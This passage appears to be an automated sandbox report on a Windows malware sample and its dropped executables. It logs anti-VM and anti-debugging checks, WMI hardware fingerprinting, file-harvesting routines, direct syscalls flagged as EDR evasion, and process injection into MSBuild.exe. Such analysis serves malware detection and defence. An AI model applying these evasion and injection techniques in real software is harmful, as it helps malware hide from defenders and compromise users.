Source: C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe TID: 7964	Thread sleep count: 155 > 30
Source: C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe TID: 7964	Thread sleep time: -110205s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1712	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UUID FROM Win32_ComputerSystemProduct

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\wxfSIz4PAi.exe

File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00412570
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	1_2_0040D1C0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_004015C0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	1_2_00411650
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	1_2_0040B610
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	1_2_0040DB60
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	1_2_00411B80
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_0040D540
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	1_2_004121F0

Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe

Code function: 1_2_00401120 GetSystemInfo,ExitProcess,

1_2_00401120

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 37885
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 60000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59071
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59696
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 33910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59479
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 48915
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59359
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 39508
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59217
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55432
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 57750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 57559
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 44022
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 57416
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 52492
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 48862
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 57250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 31123
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 57000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 47980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 56792
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 56671
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 43905
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 56546
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 56436
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 45398
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 56305
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 56198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 48249
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 56089
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 45598
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55984
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 41526
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55874
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55764
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55654
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 41943
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55546
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 43762
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55327
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 49672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55107
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 54757
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 54878
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 58269
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 54765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 54641
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 33748
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 47834
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 39808
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 34516
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 35748
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 36799
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 32306
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 58881
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 40674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 59684
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55447
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 55111
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	File opened: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	File opened: C:\Users\user\AppData\Local\Temp\u5ek.2	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.000000000720D000.00000004.00000020.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000000.1817573323.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Microsoft Hyper-V Server
Source: u5ek.3.exe, 00000006.00000003.2251637614.0000000000B78000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.000000000720D000.00000004.00000020.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000000.1817573323.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Datacenter without Hyper-V Core
Source: run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0
Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.000000000720D000.00000004.00000020.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000000.1817573323.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: QEMU_HARDU
Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.000000000720D000.00000004.00000020.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000000.1817573323.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Standard without Hyper-V Full
Source: run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1!0
Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.000000000720D000.00000004.00000020.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000000.1817573323.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Enterprise without Hyper-V Core
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942503624.000002727EC78000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllP
Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000002.2160907832.00000000042EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0/
Source: run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1
Source: run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.0
Source: u5ek.3.exe, 00000006.00000000.1817573323.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: VMWARE_VIRTUAL
Source: wxfSIz4PAi.exe, 00000000.00000003.1781179573.0000000005DA1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{5a
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2871903084.0000027200266000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: "Caption": "VMware Virtual disk",
Source: MSBuild.exe, 0000000D.00000002.2868564782.000000000146D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: wxfSIz4PAi.exe, 00000000.00000002.1986931199.0000000005DA5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr=C:\WindowsSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\WindowsE=C:\Users\userwindir=C:\WindowsIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowsuser-PCUSERNAME=userUSERPR
Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.000000000720D000.00000004.00000020.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000000.1817573323.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: 6without Hyper-V for Windows Essential Server Solutions
Source: run.exe, 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: noreply@vmware.com0
Source: u5ek.0.exe, 00000001.00000002.2160907832.00000000042EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.000000000720D000.00000004.00000020.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000000.1817573323.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Standard without Hyper-V Core
Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.000000000720D000.00000004.00000020.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000000.1817573323.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Datacenter without Hyper-V Full
Source: wxfSIz4PAi.exe, 00000000.00000003.1819490382.000000000720D000.00000004.00000020.00020000.00000000.sdmp, u5ek.3.exe, 00000006.00000000.1817573323.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	Binary or memory string: Enterprise without Hyper-V Full

Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	API call chain: ExitProcess graph end node	graph_1-70413
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	API call chain: ExitProcess graph end node	graph_1-70416
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	API call chain: ExitProcess graph end node	graph_1-70434
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	API call chain: ExitProcess graph end node	graph_1-70431
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	API call chain: ExitProcess graph end node	graph_1-71449
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	API call chain: ExitProcess graph end node	graph_1-70427
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	API call chain: ExitProcess graph end node	graph_1-70457
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	API call chain: ExitProcess graph end node	graph_1-70256
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\wxfSIz4PAi.exe

Code function: 0_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00409A73

Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe

Code function: 2_2_002DD15B VirtualProtect ?,-00000001,00000104,?,?,?,00000000

2_2_002DD15B

Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe

1_2_00416240

Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_004139E7 mov eax, dword ptr fs:[00000030h]	0_2_004139E7
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_040F54B3 push dword ptr fs:[00000030h]	0_2_040F54B3
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_05B60D90 mov eax, dword ptr fs:[00000030h]	0_2_05B60D90
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_05B73C4E mov eax, dword ptr fs:[00000030h]	0_2_05B73C4E
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_05B6092B mov eax, dword ptr fs:[00000030h]	0_2_05B6092B
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_00415DC0 mov eax, dword ptr fs:[00000030h]	1_2_00415DC0

Source: C:\Users\user\Desktop\wxfSIz4PAi.exe

Code function: 0_2_00420AEA GetProcessHeap,

0_2_00420AEA

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00409A73
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_00409C06 SetUnhandledExceptionFilter,	0_2_00409C06
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_00409EBE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00409EBE
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_0041073B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0041073B
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_05B69CDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_05B69CDA
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_05B69E6D SetUnhandledExceptionFilter,	0_2_05B69E6D
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_05B709A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_05B709A2
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Code function: 0_2_05B6A125 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_05B6A125
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_00419DC7 SetUnhandledExceptionFilter,	1_2_00419DC7
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00417B4E
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_004173DD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_004173DD
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBAB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_6BBAB1F7
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BBAB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_6BBAB66C
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6C93AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_6C93AC62
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Code function: 2_2_002DC1FD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_002DC1FD
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Code function: 2_2_002E6678 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_002E6678

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	NtSetInformationThread: Direct from: 0x6CBB617C
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	NtSetInformationThread: Direct from: 0x6C79617C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	NtQuerySystemInformation: Direct from: 0x1D5BE4
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read write

Searches for specific processes (likely to inject)

Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe

Code function: 1_2_00415D00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

1_2_00415D00

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6A421000	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 11A3008	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6A421000
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 12B2008

Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Process created: C:\Users\user\AppData\Local\Temp\u5ek.0.exe "C:\Users\user\AppData\Local\Temp\u5ek.0.exe"	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Process created: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe "C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe"	Jump to behavior
Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Process created: C:\Users\user\AppData\Local\Temp\u5ek.3.exe "C:\Users\user\AppData\Local\Temp\u5ek.3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe	Process created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe "C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exe"
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
